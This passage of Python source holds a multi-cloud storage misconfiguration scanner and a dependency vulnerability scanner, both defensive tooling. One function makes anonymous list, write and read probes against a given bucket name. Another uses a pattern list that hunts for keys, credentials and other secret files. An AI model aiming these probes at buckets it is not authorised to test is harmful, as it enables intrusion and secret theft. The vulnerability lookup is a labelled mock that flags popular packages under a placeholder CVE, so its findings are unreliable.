            'details': public_test['details'],
            'public_url': f'https://{bucket_name}.s3.amazonaws.com/'
        })
    return bucket_findings
def analyze_bucket_policy(self, policy_json, bucket_name):
    """Analyze an S3 bucket policy document for risky statements.

    Only statements whose ``Effect`` is ``Allow`` (or missing) are inspected:
    a ``Deny`` statement with wildcards restricts access, so reporting it as
    "allows access" would be a false positive.

    Args:
        policy_json: Bucket policy as a JSON string.
        bucket_name: Name copied into the ``bucket`` field of every finding.

    Returns:
        list[dict]: Findings with ``bucket``, ``issue``, ``severity`` and
        ``details`` keys; statement-level findings also carry the offending
        ``statement``. Unparseable JSON yields a single MEDIUM finding.
    """
    findings = []
    try:
        policy = json.loads(policy_json)
    except json.JSONDecodeError:
        findings.append({
            'bucket': bucket_name,
            'issue': 'Invalid bucket policy JSON',
            'severity': 'MEDIUM',
            'details': 'Bucket policy contains invalid JSON'
        })
        return findings

    # The policy grammar allows "Statement" to be one object instead of a list.
    statements = policy.get('Statement', [])
    if isinstance(statements, dict):
        statements = [statements]

    # Stored lower-cased; actions are compared case-insensitively below.
    dangerous_actions = {
        's3:*', 's3:get*', 's3:put*', 's3:delete*',
        's3:list*', '*'
    }

    for statement in statements:
        if statement.get('Effect', 'Allow') != 'Allow':
            continue

        # Check for wildcard principals: "*", {"AWS": "*"} or {"AWS": ["*", ...]}
        principal = statement.get('Principal', {})
        if isinstance(principal, dict):
            wildcard_principal = any(
                value == '*' or (isinstance(value, list) and '*' in value)
                for value in principal.values()
            )
        else:
            wildcard_principal = principal == '*'
        if wildcard_principal:
            findings.append({
                'bucket': bucket_name,
                'issue': 'Wildcard principal in bucket policy',
                'severity': 'CRITICAL',
                'details': 'Policy allows access from any principal',
                'statement': statement
            })

        # Check for overly permissive actions
        actions = statement.get('Action', [])
        if isinstance(actions, str):
            actions = [actions]
        for act in actions:
            if isinstance(act, str) and act.lower() in dangerous_actions:
                findings.append({
                    'bucket': bucket_name,
                    'issue': 'Overly permissive action in bucket policy',
                    'severity': 'HIGH',
                    'details': f'Action: {act}',
                    'statement': statement
                })

        # Check resource wildcards
        resources = statement.get('Resource', [])
        if isinstance(resources, str):
            resources = [resources]
        for res in resources:
            if isinstance(res, str) and '*' in res:
                findings.append({
                    'bucket': bucket_name,
                    'issue': 'Wildcard resource in bucket policy',
                    'severity': 'MEDIUM',
                    'details': f'Resource: {res}',
                    'statement': statement
                })
    return findings
def test_public_access(self, bucket_name):
    """Probe a bucket anonymously for public list, write and read access.

    Sends unauthenticated requests to the bucket's virtual-hosted S3 URL:
    a GET on the bucket root (listing), a PUT of a small marker object
    (write; deleted again on success) and, when listing worked, a HEAD on
    the first non-folder key taken from that listing (read).

    Args:
        bucket_name: Name of the bucket to probe.

    Returns:
        dict: ``is_public``, ``can_list``, ``can_read`` and ``can_write``
        flags plus a human-readable ``details`` string. A failed request
        leaves the corresponding flag ``False``.
    """
    import xml.etree.ElementTree as ET
    from urllib.parse import quote

    result = {
        'is_public': False,
        'can_list': False,
        'can_read': False,
        'can_write': False,
        'details': ''
    }
    bucket_url = f'https://{bucket_name}.s3.amazonaws.com/'

    # Test 1: List objects (anonymous)
    # Kept in its own variable: Test 3 parses this body after Test 2 has run.
    listing = None
    try:
        listing = requests.get(bucket_url, timeout=10)
    except requests.RequestException:
        pass
    if listing is not None and listing.status_code == 200:
        result['is_public'] = True
        result['can_list'] = True
        result['details'] += 'Bucket listing is public. '

    # Test 2: Try to upload a file (anonymous PUT)
    test_key = f'test_public_write_{int(time.time())}.txt'
    test_url = f'{bucket_url}{test_key}'
    put_response = None
    try:
        put_response = requests.put(
            test_url,
            data='test',
            headers={'Content-Type': 'text/plain'},
            timeout=10
        )
    except requests.RequestException:
        pass
    if put_response is not None and put_response.status_code == 200:
        # A world-writable bucket is public even when it cannot be listed.
        result['is_public'] = True
        result['can_write'] = True
        result['details'] += 'Bucket allows public writes. '
        # Clean up test file (best effort; the finding stands either way)
        try:
            requests.delete(test_url, timeout=5)
        except requests.RequestException:
            pass

    # Test 3: Try to download a known file (if we can list)
    if result['can_list']:
        try:
            root = ET.fromstring(listing.content)
        except ET.ParseError:
            return result
        for elem in root.findall('.//{http://s3.amazonaws.com/doc/2006-03-01/}Key'):
            test_file = elem.text or ''
            if not test_file or test_file.endswith('/'):  # Not a folder
                continue
            # Keys may contain characters that are not URL-safe.
            file_url = f'{bucket_url}{quote(test_file)}'
            try:
                file_response = requests.head(file_url, timeout=10)
            except requests.RequestException:
                break
            if file_response.status_code == 200:
                result['can_read'] = True
                result['details'] += 'Bucket contains publicly readable files. '
            # One object is enough for the probe.
            break
    return result
def scan_google_cloud_storage(self):
    """Scan Google Cloud Storage buckets for public-access misconfigurations.

    Uses the service-account file in ``self.gcp_credentials`` when set,
    otherwise the client's default credentials. For every bucket it checks
    the IAM policy for ``allUsers`` / ``allAuthenticatedUsers`` bindings and,
    when uniform bucket-level access is disabled, the bucket ACL and the
    default object ACL.

    Returns:
        list[dict]: Findings with ``bucket``, ``issue``, ``severity`` and
        ``details`` keys. Errors are printed; a failure on one bucket does
        not stop the scan of the remaining buckets.
    """
    gcs_findings = []
    public_entities = ('allUsers', 'allAuthenticatedUsers')

    try:
        if self.gcp_credentials:
            storage_client = storage.Client.from_service_account_json(self.gcp_credentials)
        else:
            storage_client = storage.Client()
        buckets = list(storage_client.list_buckets())
    except Exception as e:
        print(f"[-] GCS scan error: {e}")
        return gcs_findings

    print(f"[*] Found {len(buckets)} GCS buckets")
    for bucket in buckets:
        bucket_findings = []
        try:
            # 1. Check IAM policy
            policy = bucket.get_iam_policy()
            for binding in policy.bindings:
                # Each binding is a dict with "role" and "members" keys.
                role = binding.get('role')
                members = sorted(binding.get('members', ()))
                # Check for allUsers or allAuthenticatedUsers
                if 'allUsers' in members:
                    bucket_findings.append({
                        'bucket': bucket.name,
                        'issue': 'Bucket accessible to all users (allUsers)',
                        'severity': 'CRITICAL',
                        'details': f'Role: {role}, Members: {members}'
                    })
                if 'allAuthenticatedUsers' in members:
                    bucket_findings.append({
                        'bucket': bucket.name,
                        'issue': 'Bucket accessible to all authenticated users',
                        'severity': 'HIGH',
                        'details': f'Role: {role}, Members: {members}'
                    })

            # Legacy ACLs cannot be read while uniform bucket-level access is
            # enabled, so the ACL checks only run when it is off.
            uniform_access = bucket.iam_configuration.uniform_bucket_level_access_enabled
            if not uniform_access:
                # 2. Check bucket permissions (ACL)
                for entry in bucket.acl:
                    if entry['entity'] in public_entities:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': f'Bucket ACL allows public access: {entry["entity"]}',
                            'severity': 'HIGH',
                            'details': f'Role: {entry["role"]}'
                        })
                # 3. Check for uniform bucket-level access
                bucket_findings.append({
                    'bucket': bucket.name,
                    'issue': 'Uniform bucket-level access disabled',
                    'severity': 'MEDIUM',
                    'details': 'Using fine-grained ACLs instead of IAM'
                })
                # 4. Check default object ACL
                for entry in bucket.default_object_acl:
                    if entry['entity'] in public_entities:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Default object ACL allows public access',
                            'severity': 'HIGH',
                            'details': f'Entity: {entry["entity"]}, Role: {entry["role"]}'
                        })
        except Exception as e:
            print(f"[-] GCS scan error for bucket {bucket.name}: {e}")
        # Keep whatever was found before an error interrupted this bucket.
        gcs_findings.extend(bucket_findings)
    return gcs_findings
def scan_azure_blob_storage(self):
    """Scan Azure Blob Storage containers for public access and risky blobs.

    Requires ``self.azure_connection_string``. For every container it reports
    a public access level, stored access policies that grant both read and
    write, and blobs whose names ``is_sensitive_file`` flags.

    Returns:
        list[dict]: Findings with ``container``, ``issue``, ``severity`` and
        ``details`` keys (sensitive-blob findings also carry ``url``).
        Errors are printed; a failure on one container does not stop the
        scan of the remaining containers.
    """
    azure_findings = []
    if not self.azure_connection_string:
        print("[-] Azure connection string required")
        return azure_findings

    try:
        blob_service_client = BlobServiceClient.from_connection_string(
            self.azure_connection_string
        )
        containers_list = list(blob_service_client.list_containers())
    except Exception as e:
        print(f"[-] Azure storage scan error: {e}")
        return azure_findings

    print(f"[*] Found {len(containers_list)} Azure containers")
    for container in containers_list:
        container_findings = []
        container_name = container['name']
        try:
            # Get container client
            container_client = blob_service_client.get_container_client(container_name)
            # Check container access policy
            access_policy = container_client.get_container_access_policy()

            # Check if public access is allowed. A private container reports
            # None here, so the value is tested rather than compared to 'None'.
            public_access = container['public_access']
            access_level = getattr(public_access, 'value', public_access)
            if access_level not in (None, '', 'None'):
                container_findings.append({
                    'container': container_name,
                    'issue': f'Container has public access: {access_level}',
                    'severity': 'CRITICAL' if access_level == 'container' else 'HIGH',
                    'details': f'Access level: {access_level}'
                })

            # Check signed identifiers (stored access policies); a list of
            # objects, each with an optional access_policy.
            for sid in access_policy.get('signed_identifiers') or []:
                stored_policy = getattr(sid, 'access_policy', None)
                permissions = getattr(stored_policy, 'permission', None) or ''
                # Check for overly permissive policies
                if 'r' in permissions and 'w' in permissions:
                    container_findings.append({
                        'container': container_name,
                        'issue': 'SAS policy allows both read and write',
                        'severity': 'HIGH',
                        'details': f'Permissions: {permissions}'
                    })

            # Check for sensitive blobs
            try:
                for blob in container_client.list_blobs():
                    if self.is_sensitive_file(blob.name):
                        container_findings.append({
                            'container': container_name,
                            'issue': 'Sensitive blob found',
                            'severity': 'HIGH',
                            'details': f'Blob: {blob.name}',
                            'url': f'https://{blob_service_client.account_name}.blob.core.windows.net/{container_name}/{blob.name}'
                        })
            except Exception as e:
                print(f"[-] Could not list blobs in {container_name}: {e}")
        except Exception as e:
            print(f"[-] Azure storage scan error for container {container_name}: {e}")
        # Keep whatever was found before an error interrupted this container.
        azure_findings.extend(container_findings)
    return azure_findings
def is_sensitive_file(self, filename):
    """Return True when the lower-cased name matches any sensitive-file pattern."""
    candidate = filename.lower()
    indicators = (
        r'\.(pem|key|ppk|p12|pfx|crt|cer)$',  # certificates and private keys
        r'\.(env|config|conf|ini|properties|yml|yaml|xml|json)$',  # configuration
        r'\.(sql|db|sqlite|mdb|accdb)$',  # databases
        r'\.(log|txt)$',  # logs
        r'\.(bak|backup|old|orig|save|swp|tmp)$',  # backups
        r'(password|secret|token|key|credential)',  # tell-tale words anywhere in the name
        r'(id_rsa|id_dsa|id_ecdsa)',  # SSH private keys
        r'\.git/',  # git metadata
    )
    return any(re.search(expression, candidate) for expression in indicators)
def run_cloud_storage_scan(self):
    """Run the AWS, GCS and Azure scans in turn and assemble one report dict."""
    print("[*] Starting cloud storage misconfiguration scan")

    # (service name used in the report, short label for the summary line, scan method)
    providers = (
        ('AWS S3', 'AWS S3', 'scan_aws_s3'),
        ('Google Cloud Storage', 'GCS', 'scan_google_cloud_storage'),
        ('Azure Blob Storage', 'Azure', 'scan_azure_blob_storage'),
    )

    combined = []
    per_service = {}
    for service_name, short_label, method_name in providers:
        print(f"[*] Scanning {service_name}...")
        service_findings = getattr(self, method_name)()
        combined.extend(service_findings)
        print(f"[+] {short_label} scan complete: {len(service_findings)} findings")
        per_service[service_name] = len(service_findings)

    # Generate report
    return {
        'total_findings': len(combined),
        'findings_by_severity': self.categorize_findings(combined),
        'findings_by_service': per_service,
        'detailed_findings': combined
    }
def categorize_findings(self, findings):
    """Count findings per severity level.

    A finding without a ``severity`` key counts as MEDIUM; severities outside
    the four known levels are ignored.
    """
    tally = dict.fromkeys(('CRITICAL', 'HIGH', 'MEDIUM', 'LOW'), 0)
    for item in findings:
        level = item.get('severity', 'MEDIUM')
        if level in tally:
            tally[level] += 1
    return tally
# Usage
import time
# Example run: build the scanner from placeholder credentials, scan every
# provider and print a short console summary of the report.
scanner = CloudStorageScanner(
    aws_profile='production',
    gcp_credentials='/path/to/credentials.json',
    azure_connection_string='DefaultEndpointsProtocol=https;AccountName=...',
)
report = scanner.run_cloud_storage_scan()

banner = '=' * 60
print("\n" + banner)
print("CLOUD STORAGE MISCONFIGURATION REPORT")
print(banner)
print("Total Findings: {}".format(report['total_findings']))

# Only services and severities with at least one finding are listed.
print("\nFindings by Service:")
for service, count in report['findings_by_service'].items():
    if count <= 0:
        continue
    print(f" {service}: {count}")

print("\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count <= 0:
        continue
    print(f" {severity}: {count}")

# Print critical findings (first five only)
critical_findings = [
    entry for entry in report['detailed_findings']
    if entry.get('severity') == 'CRITICAL'
]
if critical_findings:
    print("\nCRITICAL FINDINGS:")
    for finding in critical_findings[:5]:
        location = finding.get('bucket', finding.get('container', 'Unknown'))
        print(f" - {location}: {finding['issue']}")
#!/usr/bin/env python3
"""
Advanced Dependency Vulnerability Scanner
Integrates multiple vulnerability databases and scanners
"""
import subprocess
import json
import yaml
import toml
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List, Set
import requests
from datetime import datetime
import concurrent.futures
class DependencyVulnerabilityScanner:
    """Locate dependency manifests in a project tree and report risky entries.

    Package look-ups go through ``check_vulnerability_db``, which is a mock
    that flags a hard-coded list of package names. Dockerfile and Terraform
    files are checked with simple text heuristics.
    """

    # Lower-cased file name -> name of the method that scans it. Methods that
    # this class does not define are skipped by ``scan_dependency_file``.
    _SCANNERS_BY_NAME = {
        'package.json': 'scan_npm_package',
        'yarn.lock': 'scan_npm_lockfile',
        'package-lock.json': 'scan_npm_lockfile',
        'requirements.txt': 'scan_pip_requirements',
        'pom.xml': 'scan_java_dependencies',
        'build.gradle': 'scan_java_dependencies',
        'build.gradle.kts': 'scan_java_dependencies',
        'gemfile': 'scan_ruby_gems',
        'gemfile.lock': 'scan_ruby_gems',
        'composer.json': 'scan_php_composer',
        'composer.lock': 'scan_php_composer',
        'go.mod': 'scan_go_modules',
        'go.sum': 'scan_go_modules',
        'cargo.toml': 'scan_rust_cargo',
        'cargo.lock': 'scan_rust_cargo',
        'dockerfile': 'scan_dockerfile',
    }

    # Lower-cased file suffix -> scanner method name (consulted after the name table).
    _SCANNERS_BY_SUFFIX = {
        '.tf': 'scan_terraform',
        '.hcl': 'scan_terraform',
        '.yml': 'scan_yaml_dependencies',
        '.yaml': 'scan_yaml_dependencies',
        '.csproj': 'scan_dotnet_proj',
        '.vbproj': 'scan_dotnet_proj',
    }

    # Package names the mock database treats as vulnerable, per ecosystem.
    _MOCK_CRITICAL_PACKAGES = {
        'npm': ('lodash', 'express', 'moment', 'axios'),
        'pypi': ('django', 'flask', 'requests', 'urllib3'),
        'maven': ('log4j', 'spring-core', 'jackson-databind'),
    }

    def __init__(self, project_path):
        """Remember the project root and the known vulnerability-source URLs."""
        self.project_path = Path(project_path)
        self.vulnerabilities = []
        self.vulnerability_sources = {
            'nvd': 'https://services.nvd.nist.gov/rest/json/cves/1.0',
            'oss_index': 'https://ossindex.sonatype.org/api/v3/component-report',
            'github_advisory': 'https://api.github.com/advisories'
        }

    def _relative(self, file_path):
        """Return ``file_path`` relative to the project root as a string.

        Falls back to the path as given when it lies outside the project.
        """
        try:
            return str(Path(file_path).relative_to(self.project_path))
        except ValueError:
            return str(file_path)

    def scan_all_dependencies(self):
        """Scan every dependency file in the project and return the report dict."""
        print(f"[*] Scanning project at {self.project_path}")
        dependency_files = self.find_dependency_files()
        print(f"[*] Found {len(dependency_files)} dependency files")
        all_vulnerabilities = []
        for dep_file in dependency_files:
            print(f"[*] Scanning {self._relative(dep_file)}")
            all_vulnerabilities.extend(self.scan_dependency_file(dep_file))
        # Remove duplicates
        unique_vulns = self.deduplicate_vulnerabilities(all_vulnerabilities)
        # Generate report
        return self.generate_report(unique_vulns)

    def find_dependency_files(self):
        """Return the sorted list of dependency-related files under the project root."""
        dependency_patterns = [
            # Package managers
            'package.json', 'yarn.lock', 'package-lock.json',
            'requirements.txt', 'Pipfile', 'Pipfile.lock', 'poetry.lock',
            'composer.json', 'composer.lock',
            'Gemfile', 'Gemfile.lock',
            'pom.xml', 'build.gradle', 'build.gradle.kts',
            'go.mod', 'go.sum',
            'Cargo.toml', 'Cargo.lock',
            'nuget.config', 'packages.config',
            '*.csproj', '*.vbproj',
            # Configuration files that might contain dependencies
            '.terraform.lock.hcl',
            'docker-compose.yml', 'docker-compose.yaml',
            'Dockerfile',
            'environment.yml',  # Conda
            # Infrastructure as Code
            '*.tf',  # Terraform
            '*.yml', '*.yaml',  # Ansible, Kubernetes
            # CI/CD
            '.github/workflows/*.yml', '.github/workflows/*.yaml',
            '.gitlab-ci.yml',
            'Jenkinsfile',
            '.circleci/config.yml',
            # IDE/Editor
            '.vsconfig',
        ]
        found_files = set()
        for pattern in dependency_patterns:
            # rglob treats literal names and glob patterns alike.
            found_files.update(
                path for path in self.project_path.rglob(pattern) if path.is_file()
            )
        # Sorted so repeated scans visit files in the same order.
        return sorted(found_files)

    def scan_dependency_file(self, file_path):
        """Scan one dependency file with the scanner registered for its type.

        Returns an empty list when no scanner is registered or implemented
        for the file, or when the scanner raises (the error is printed).
        """
        file_path = Path(file_path)
        method_name = (
            self._SCANNERS_BY_NAME.get(file_path.name.lower())
            or self._SCANNERS_BY_SUFFIX.get(file_path.suffix.lower())
        )
        # Several registered scanners are not defined on this class; looking
        # them up with a default avoids an AttributeError per file.
        scan = getattr(self, method_name, None) if method_name else None
        if scan is None:
            return []
        try:
            return scan(file_path)
        except Exception as e:
            print(f"[-] Error scanning {file_path}: {e}")
            return []

    def scan_npm_package(self, file_path):
        """Scan an npm package.json: every dependency section is checked."""
        with open(file_path, encoding='utf-8') as f:
            package_data = json.load(f)
        # Check dependencies
        all_deps = {}
        for section in ('dependencies', 'devDependencies',
                        'peerDependencies', 'optionalDependencies'):
            all_deps.update(package_data.get(section) or {})
        vulns = []
        for dep, version in all_deps.items():
            # Clean version string: drop leading range operators (^, ~, >=, ...)
            clean_version = str(version).lstrip('^~<>= ')
            vulns.extend(self.check_vulnerability_db('npm', dep, clean_version, file_path))
        return vulns

    @staticmethod
    def _iter_yarn_lock_entries(content):
        """Yield ``(package, version)`` pairs from yarn.lock text.

        Simplified line-based parsing: an unindented line starts an entry and
        the first indented ``version`` line below it supplies the version.
        """
        current_pkg = None
        for raw_line in content.splitlines():
            stripped = raw_line.strip()
            if not stripped or stripped.startswith('#'):
                continue
            if not raw_line[0].isspace():
                # Entry header, e.g. `lodash@^4.17.11, lodash@^4.17.15:`
                first_spec = stripped.rstrip(':').split(',')[0].strip().strip('"')
                # Search from index 1 so the leading "@" of a scoped name is
                # not mistaken for the name/range separator.
                separator = first_spec.find('@', 1)
                name = first_spec[:separator] if separator > 0 else first_spec
                # Headers such as `__metadata` are not packages.
                current_pkg = None if name.startswith('__') else name
            elif current_pkg and stripped.split()[0].rstrip(':') == 'version':
                yield current_pkg, stripped.split()[-1].strip('"')
                current_pkg = None

    def scan_npm_lockfile(self, file_path):
        """Scan package-lock.json or yarn.lock for the exact resolved versions."""
        vulns = []
        lock_name = Path(file_path).name.lower()
        with open(file_path, encoding='utf-8') as f:
            if lock_name == 'package-lock.json':
                lock_data = json.load(f)
                # "packages" maps install paths to package metadata; the empty
                # key is the root project itself.
                for pkg_path, pkg_info in (lock_data.get('packages') or {}).items():
                    if pkg_path and 'version' in pkg_info:
                        # Text after the last "node_modules/" is the package
                        # name, including any "@scope/" prefix.
                        pkg_name = pkg_path.split('node_modules/')[-1]
                        vulns.extend(self.check_vulnerability_db(
                            'npm', pkg_name, pkg_info['version'], file_path
                        ))
            elif lock_name == 'yarn.lock':
                for pkg_name, version in self._iter_yarn_lock_entries(f.read()):
                    vulns.extend(self.check_vulnerability_db(
                        'npm', pkg_name, version, file_path
                    ))
        return vulns

    def scan_pip_requirements(self, file_path):
        """Scan a requirements.txt; only ``name==version`` pins are checked."""
        vulns = []
        with open(file_path, encoding='utf-8') as f:
            for raw_line in f:
                # Drop inline comments and environment markers.
                line = raw_line.split('#', 1)[0].split(';', 1)[0].strip()
                # Skip blanks and option lines such as `-r other.txt`.
                if not line or line.startswith('-'):
                    continue
                name_part, separator, version_part = line.partition('==')
                if not separator or not version_part.strip():
                    continue
                # Check for extras: "pkg[extra]" -> "pkg"
                pkg_name = name_part.split('[')[0].strip()
                # Anything after the version (e.g. --hash options) is dropped.
                version = version_part.split()[0]
                vulns.extend(self.check_vulnerability_db('pypi', pkg_name, version, file_path))
        return vulns

    def scan_java_dependencies(self, file_path):
        """Scan a Maven pom.xml or a Gradle build file (Groovy or Kotlin DSL)."""
        vulns = []
        file_name = Path(file_path).name
        if file_name == 'pom.xml':
            root = ET.parse(file_path).getroot()
            # Reuse whatever namespace the root element declares so poms with
            # and without the Maven xmlns are both handled.
            ns = root.tag[:root.tag.index('}') + 1] if root.tag.startswith('{') else ''
            for dep in root.iter(f'{ns}dependency'):
                group_id = dep.findtext(f'{ns}groupId')
                artifact_id = dep.findtext(f'{ns}artifactId')
                version = dep.findtext(f'{ns}version')
                if group_id is not None and artifact_id is not None and version is not None:
                    pkg_name = f"{group_id.strip()}:{artifact_id.strip()}"
                    vulns.extend(self.check_vulnerability_db(
                        'maven', pkg_name, version.strip(), file_path
                    ))
        elif 'build.gradle' in file_name:
            # Parse Gradle build file (simplified)
            import re
            with open(file_path, encoding='utf-8') as f:
                content = f.read()
            # Matches `implementation 'g:a:v'` and `implementation("g:a:v")`,
            # including prefixed configurations such as testImplementation.
            declaration = re.compile(
                r"\b\w*(?:[iI]mplementation|[aA]pi|[cC]ompile(?:Only)?|[rR]untimeOnly)"
                r"\s*\(?\s*['\"]([^:'\"\s]+):([^:'\"\s]+):([^:'\"\s]+)['\"]"
            )
            for group, artifact, version in declaration.findall(content):
                vulns.extend(self.check_vulnerability_db(
                    'maven', f"{group}:{artifact}", version, file_path
                ))
        return vulns

    def check_vulnerability_db(self, ecosystem, package, version, file_path=None):
        """Check a package against the (mock) vulnerability database.

        This is a simplified stand-in. A real implementation would query the
        NVD API, OSS Index, the GitHub Advisory Database and any internal
        vulnerability database.

        Args:
            ecosystem: ``'npm'``, ``'pypi'`` or ``'maven'``.
            package: Package name; Maven names use ``group:artifact``.
            version: Version string recorded on the finding.
            file_path: Optional manifest the package came from; when given,
                the finding carries a project-relative ``file`` entry.

        Returns:
            list[dict]: Zero or one mock finding.
        """
        known = self._MOCK_CRITICAL_PACKAGES.get(ecosystem, ())
        # Maven coordinates are "group:artifact" while the mock list holds
        # artifact ids, so only the last component is compared.
        short_name = package.rsplit(':', 1)[-1].lower()
        if short_name not in known:
            return []
        finding = {
            'ecosystem': ecosystem,
            'package': package,
            'version': version,
            'vulnerability': 'CVE-2023-XXXXX',
            'severity': 'HIGH',
            'description': 'Mock vulnerability for demonstration',
            'source': 'mock',
        }
        if file_path is not None:
            finding['file'] = self._relative(file_path)
        return [finding]

    def scan_dockerfile(self, file_path):
        """Scan a Dockerfile for outdated base images and unpinned apt packages."""
        vulns = []
        # Check for old or vulnerable base images
        vulnerable_images = [
            'node:8', 'python:2.7', 'ubuntu:14.04',
            'alpine:3.5', 'centos:6', 'debian:8'
        ]
        relative_name = self._relative(file_path)
        with open(file_path, encoding='utf-8') as f:
            lines = f.readlines()
        for line in lines:
            line = line.strip()
            tokens = line.split()
            # Check base image
            if tokens and tokens[0].upper() == 'FROM':
                # Skip flags such as --platform=... to reach the image reference.
                image = next((t for t in tokens[1:] if not t.startswith('--')), None)
                if image is None:
                    continue
                for vulnerable in vulnerable_images:
                    if vulnerable in image:
                        vulns.append({
                            'file': relative_name,
                            'type': 'docker_image',
                            'image': image,
                            'vulnerability': 'Outdated base image',
                            'severity': 'HIGH',
                            'description': f'Base image {image} is outdated and may contain vulnerabilities'
                        })
            # Check for apt-get install without version pins
            elif 'apt-get install' in line and '=' not in line:
                vulns.append({
                    'file': relative_name,
                    'type': 'docker_package',
                    'line': line,
                    'vulnerability': 'Unpinned package versions',
                    'severity': 'MEDIUM',
                    'description': 'Package versions should be pinned to avoid unexpected updates'
                })
        return vulns

    def scan_terraform(self, file_path):
        """Scan a Terraform file for provider/module blocks worth reviewing."""
        import re
        vulns = []
        with open(file_path, encoding='utf-8') as f:
            content = f.read()
        # Look for provider and module declarations
        provider_patterns = [
            r'provider\s+"([^"]+)"\s*{',
            r'module\s+"([^"]+)"\s*{'
        ]
        # Names that trigger a review finding when they appear in a block name
        vulnerable_providers = ['aws', 'azurerm', 'google', 'kubernetes']
        relative_name = self._relative(file_path)
        for pattern in provider_patterns:
            for match in re.findall(pattern, content):
                if any(vp in match.lower() for vp in vulnerable_providers):
                    vulns.append({
                        'file': relative_name,
                        'type': 'terraform',
                        'provider': match,
                        'vulnerability': 'Potential misconfiguration',
                        'severity': 'MEDIUM',
                        'description': f'Provider {match} may have security implications'
                    })
        return vulns

    @staticmethod
    def _dedup_key(vuln):
        """Build the identity used to recognise duplicate findings.

        Package findings are identified by package, version and vulnerability.
        Findings without a package (Dockerfile, Terraform) are identified by
        type, file and the flagged item, so distinct findings are not merged.
        """
        if vuln.get('package'):
            return ('package', vuln.get('package'), vuln.get('version', ''),
                    vuln.get('vulnerability', ''))
        subject = vuln.get('image') or vuln.get('line') or vuln.get('provider') or ''
        return ('finding', vuln.get('type', ''), vuln.get('file', ''), subject,
                vuln.get('vulnerability', ''))

    def deduplicate_vulnerabilities(self, vulnerabilities):
        """Remove duplicate vulnerabilities, keeping the first occurrence of each."""
        unique_vulns = []
        seen = set()
        for vuln in vulnerabilities:
            vuln_id = self._dedup_key(vuln)
            if vuln_id not in seen:
                seen.add(vuln_id)
                unique_vulns.append(vuln)
        return unique_vulns

    def generate_report(self, vulnerabilities):
        """Build the report dict: totals, per-severity and per-ecosystem counts."""
        # Count by severity
        by_severity = {
            severity: sum(1 for v in vulnerabilities if v.get('severity') == severity)
            for severity in ('CRITICAL', 'HIGH', 'MEDIUM', 'LOW')
        }
        # Count by ecosystem; findings without one are grouped as "unknown"
        by_ecosystem = {}
        for vuln in vulnerabilities:
            ecosystem = vuln.get('ecosystem', 'unknown')
            by_ecosystem[ecosystem] = by_ecosystem.get(ecosystem, 0) + 1
        return {
            'scan_date': datetime.now().isoformat(),
            'project_path': str(self.project_path),
            'total_vulnerabilities': len(vulnerabilities),
            'vulnerabilities_by_severity': by_severity,
            'vulnerabilities_by_ecosystem': by_ecosystem,
            'detailed_vulnerabilities': vulnerabilities
        }
# Advanced integration with actual vulnerability databases
class AdvancedVulnerabilityChecker:
    """Query public vulnerability databases over HTTP.

    Every ``check_*`` method returns the decoded JSON body on an HTTP 200
    response and ``None`` otherwise (network error, other status code or a
    body that is not JSON).
    """

    REQUEST_TIMEOUT = 10  # seconds, applied to every request

    # GitHub's advisory API names the Python ecosystem "pip".
    _GITHUB_ECOSYSTEMS = {'pypi': 'pip'}

    def __init__(self):
        # Kept for callers that store results; the check_* methods do not use it.
        self.cache = {}

    def _request_json(self, method, url, **kwargs):
        """Send one request and return its JSON body, or ``None`` on any failure."""
        try:
            response = requests.request(method, url, timeout=self.REQUEST_TIMEOUT, **kwargs)
        except requests.RequestException as e:
            print(f"[-] Request to {url} failed: {e}")
            return None
        if response.status_code != 200:
            return None
        try:
            return response.json()
        except ValueError:
            # The body was not valid JSON.
            return None

    def check_nvd(self, cpe_string):
        """Look up CVEs for a CPE match string in the NVD (CVE API 2.0).

        Args:
            cpe_string: CPE 2.3 match string, e.g.
                ``cpe:2.3:a:apache:log4j:2.14.1:*:*:*:*:*:*:*``.

        Returns:
            The decoded API 2.0 response, or ``None``.
        """
        url = "https://services.nvd.nist.gov/rest/json/cves/2.0"
        # Passed as a query parameter so the CPE string is URL-encoded.
        return self._request_json('GET', url, params={'virtualMatchString': cpe_string})

    def check_oss_index(self, ecosystem, package, version):
        """Request a Sonatype OSS Index component report for one package version.

        Args:
            ecosystem: Package URL type, e.g. ``'npm'``, ``'pypi'``, ``'maven'``.
            package: Package name; Maven names may use ``group:artifact``.
            version: Exact version to look up.
        """
        url = "https://ossindex.sonatype.org/api/v3/component-report"
        # Maven package URLs separate group and artifact with "/".
        purl_name = package.replace(':', '/') if ecosystem == 'maven' else package
        payload = {
            "coordinates": [f"pkg:{ecosystem}/{purl_name}@{version}"]
        }
        headers = {
            "Content-Type": "application/json"
        }
        return self._request_json('POST', url, json=payload, headers=headers)

    def check_github_advisory(self, ecosystem, package):
        """List GitHub global security advisories that affect a package.

        Args:
            ecosystem: Ecosystem name; ``'pypi'`` is translated to ``'pip'``.
            package: Package name (``name`` or ``name@version``).
        """
        url = "https://api.github.com/advisories"
        params = {
            'ecosystem': self._GITHUB_ECOSYSTEMS.get(ecosystem, ecosystem),
            # "affects" is the package filter of this endpoint.
            'affects': package
        }
        headers = {
            'Accept': 'application/vnd.github+json'
        }
        return self._request_json('GET', url, params=params, headers=headers)
# Usage
# Example run: scan a project directory and print a console summary.
scanner = DependencyVulnerabilityScanner("/path/to/your/project")
report = scanner.scan_all_dependencies()

banner = '=' * 60
print("\n" + banner)
print("DEPENDENCY VULNERABILITY SCAN REPORT")
print(banner)
print("Project: {}".format(report['project_path']))
print("Scan Date: {}".format(report['scan_date']))
print("Total Vulnerabilities: {}".format(report['total_vulnerabilities']))

# Only severities and ecosystems with at least one entry are listed.
print("\nBy Severity:")
for severity, count in report['vulnerabilities_by_severity'].items():
    if count <= 0:
        continue
    print(f" {severity}: {count}")

print("\nBy Ecosystem:")
for ecosystem, count in report['vulnerabilities_by_ecosystem'].items():
    if count <= 0:
        continue
    print(f" {ecosystem}: {count}")

# Print critical vulnerabilities
critical_vulns = [
    entry for entry in report['detailed_vulnerabilities']
    if entry.get('severity') == 'CRITICAL'
]
if critical_vulns:
    print("\nCRITICAL VULNERABILITIES:")
    for vuln in critical_vulns[:5]:  # Show first 5
        package, version, name = vuln.get('package'), vuln.get('version'), vuln.get('vulnerability')
        print(f" - {package} {version}: {name}")
#!/usr/bin/env python3
"""
Advanced Software Composition Analysis (SCA) Integration
Combines multiple SCA tools and vulnerability databases
"""
import subprocess
import json
